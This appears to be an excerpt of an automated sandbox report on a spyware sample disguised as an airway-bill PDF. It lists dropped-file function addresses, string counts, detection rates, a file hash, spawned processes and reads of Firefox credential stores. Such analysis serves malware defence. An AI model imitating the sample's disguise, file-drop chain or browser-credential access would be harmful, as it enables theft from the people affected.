                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D8A9A65_2_24D8A9A6
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CD69625_2_24CD6962
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CBEA805_2_24CBEA80
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D76BD75_2_24D76BD7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D7AB405_2_24D7AB40
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB14605_2_24CB1460
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D7F43F5_2_24D7F43F
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D5D5B05_2_24D5D5B0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D775715_2_24D77571
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D716CC5_2_24D716CC
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D056305_2_24D05630
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D7F7B05_2_24D7F7B0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC70C05_2_24CC70C0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D6F0CC5_2_24D6F0CC
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D7F0E05_2_24D7F0E0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D770E95_2_24D770E9
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CCB1B05_2_24CCB1B0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF516C5_2_24CF516C
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D8B16B5_2_24D8B16B
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAF1725_2_24CAF172
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDB2C05_2_24CDB2C0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D612ED5_2_24D612ED
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC52A05_2_24CC52A0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D0739A5_2_24D0739A
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAD34C5_2_24CAD34C
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D7132D5_2_24D7132D
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D7FCF25_2_24D7FCF2
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D39C325_2_24D39C32
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDFDC05_2_24CDFDC0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC3D405_2_24CC3D40
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D71D5A5_2_24D71D5A
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D77D735_2_24D77D73
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC9EB05_2_24CC9EB0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24C83FD25_2_24C83FD2
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24C83FD55_2_24C83FD5
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC1F925_2_24CC1F92
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D7FFB15_2_24D7FFB1
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D7FF095_2_24D7FF09
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC38E05_2_24CC38E0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D2D8005_2_24D2D800
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC99505_2_24CC9950
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDB9505_2_24CDB950
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D559105_2_24D55910
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D6DAC65_2_24D6DAC6
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D05AA05_2_24D05AA0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D61AA35_2_24D61AA3
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D5DAAC5_2_24D5DAAC
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D77A465_2_24D77A46
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D7FA495_2_24D7FA49
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D33A6C5_2_24D33A6C
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D35BF05_2_24D35BF0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CFDBF95_2_24CFDBF9
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDFB805_2_24CDFB80
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D7FB765_2_24D7FB76
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_1_004015605_1_00401560
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_1_004020585_1_00402058
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_1_004010E05_1_004010E0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_1_004032305_1_00403230
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_1_004012C05_1_004012C0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_1_004033505_1_00403350
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_1_004015535_1_00401553
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_1_004025B05_1_004025B0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_1_004028705_1_00402870
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_1_00401D695_1_00401D69
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_1_00401D705_1_00401D70
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFCode function: 7_2_02AA20C47_2_02AA20C4
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A383A6C11_2_1A383A6C
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3CFA4911_2_1A3CFA49
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3C7A4611_2_1A3C7A46
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A355AA011_2_1A355AA0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3ADAAC11_2_1A3ADAAC
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3B1AA311_2_1A3B1AA3
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3BDAC611_2_1A3BDAC6
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3CFB7611_2_1A3CFB76
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A32FB8011_2_1A32FB80
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A385BF011_2_1A385BF0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A34DBF911_2_1A34DBF9
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A37D80011_2_1A37D800
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3138E011_2_1A3138E0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3A591011_2_1A3A5910
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A31995011_2_1A319950
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A32B95011_2_1A32B950
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A319EB011_2_1A319EB0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3CFF0911_2_1A3CFF09
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3CFFB111_2_1A3CFFB1
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A311F9211_2_1A311F92
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A2D3FD511_2_1A2D3FD5
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A2D3FD211_2_1A2D3FD2
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A389C3211_2_1A389C32
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3CFCF211_2_1A3CFCF2
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3C7D7311_2_1A3C7D73
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3C1D5A11_2_1A3C1D5A
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A313D4011_2_1A313D40
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A32FDC011_2_1A32FDC0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3152A011_2_1A3152A0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3B12ED11_2_1A3B12ED
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A32B2C011_2_1A32B2C0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3C132D11_2_1A3C132D
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A2FD34C11_2_1A2FD34C
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A35739A11_2_1A35739A
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3C70E911_2_1A3C70E9
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3CF0E011_2_1A3CF0E0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3170C011_2_1A3170C0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3BF0CC11_2_1A3BF0CC
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3DB16B11_2_1A3DB16B
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A34516C11_2_1A34516C
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A2FF17211_2_1A2FF172
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A31B1B011_2_1A31B1B0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A35563011_2_1A355630
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3C16CC11_2_1A3C16CC
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3CF7B011_2_1A3CF7B0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3CF43F11_2_1A3CF43F
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A30146011_2_1A301460
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3C757111_2_1A3C7571
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3AD5B011_2_1A3AD5B0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3D95C311_2_1A3D95C3
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A30EA8011_2_1A30EA80
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3CAB4011_2_1A3CAB40
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3C6BD711_2_1A3C6BD7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A31A84011_2_1A31A840
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A31284011_2_1A312840
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A2F68B811_2_1A2F68B8
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A33E8F011_2_1A33E8F0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A32696211_2_1A326962
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3129A011_2_1A3129A0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3DA9A611_2_1A3DA9A6
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3CEE2611_2_1A3CEE26
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A310E5911_2_1A310E59
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A322E9011_2_1A322E90
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3CCE9311_2_1A3CCE93
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3CEEDB11_2_1A3CEEDB
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A330F3011_2_1A330F30
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3B2F3011_2_1A3B2F30
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A352F2811_2_1A352F28
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A384F4011_2_1A384F40
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A38EFA011_2_1A38EFA0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A31CFE011_2_1A31CFE0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A302FC811_2_1A302FC8
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A310C0011_2_1A310C00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3B0CB511_2_1A3B0CB5
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A300CF211_2_1A300CF2
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3ACD1F11_2_1A3ACD1F
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A31AD0011_2_1A31AD00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A328DBF11_2_1A328DBF
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A30ADE011_2_1A30ADE0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3B027411_2_1A3B0274
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3902C011_2_1A3902C0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3CA35211_2_1A3CA352
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A31E3F011_2_1A31E3F0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3D03E611_2_1A3D03E6
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3A200011_2_1A3A2000
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3AA11811_2_1A3AA118
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A30010011_2_1A300100
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A39815811_2_1A398158
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3D01AA11_2_1A3D01AA
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3C41A211_2_1A3C41A2
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3C81CC11_2_1A3C81CC
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A32C6E011_2_1A32C6E0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A31077011_2_1A310770
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A33475011_2_1A334750
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A30C7C011_2_1A30C7C0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3B442011_2_1A3B4420
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3C244611_2_1A3C2446
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3BE4F611_2_1A3BE4F6
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A31053511_2_1A310535
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3D059111_2_1A3D0591
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_1_0040156011_1_00401560
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_1_0040205811_1_00402058
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_1_004025B011_1_004025B0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_1_0040287011_1_00402870
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_1_004010E011_1_004010E0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_1_0040323011_1_00403230
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_1_004012C011_1_004012C0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_1_0040335011_1_00403350
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_1_0040155311_1_00401553
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_1_00401D6911_1_00401D69
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_1_00401D7011_1_00401D70
                      Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\hdcleziT.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: String function: 02B38798 appears 54 times
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: String function: 02B244D0 appears 32 times
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: String function: 02B246A4 appears 244 times
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: String function: 02B3881C appears 45 times
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: String function: 02B2480C appears 931 times
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: String function: 02B244AC appears 73 times
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: String function: 1A357E54 appears 111 times
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: String function: 1A2FB970 appears 280 times
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: String function: 1A38F290 appears 105 times
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: String function: 24D2EA12 appears 86 times
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: String function: 1A345130 appears 58 times
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: String function: 24CF5130 appears 58 times
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: String function: 24CAB970 appears 280 times
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: String function: 24D07E54 appears 111 times
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: String function: 24D3F290 appears 105 times
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: String function: 1A37EA12 appears 86 times
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFCode function: String function: 02AB8798 appears 48 times
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFCode function: String function: 02AA46A4 appears 154 times
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFCode function: String function: 02AA480C appears 619 times
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163345039.0000000021795000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.00000000208A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163345039.0000000021766000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@27/8@9/5
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B27F52 GetDiskFreeSpaceA,0_2_02B27F52
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B36D48 CoCreateInstance,0_2_02B36D48
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeFile created: C:\Users\Public\TizelcdhF.cmdJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5588:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5328:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6484:120:WilError_03
                      Source: C:\Windows\SysWOW64\proquota.exeFile created: C:\Users\user\AppData\Local\Temp\0j0OId92LJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: proquota.exe, 00000012.00000002.3369025968.0000000000852000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2968997734.0000000000852000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2968892500.0000000000830000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3369025968.0000000000881000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2977095267.000000000085D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeReversingLabs: Detection: 26%
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeVirustotal: Detection: 33%
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeFile read: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe "C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe"
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess created: C:\Users\Public\Libraries\hdcleziT.pif C:\Users\Public\Libraries\hdcleziT.pif
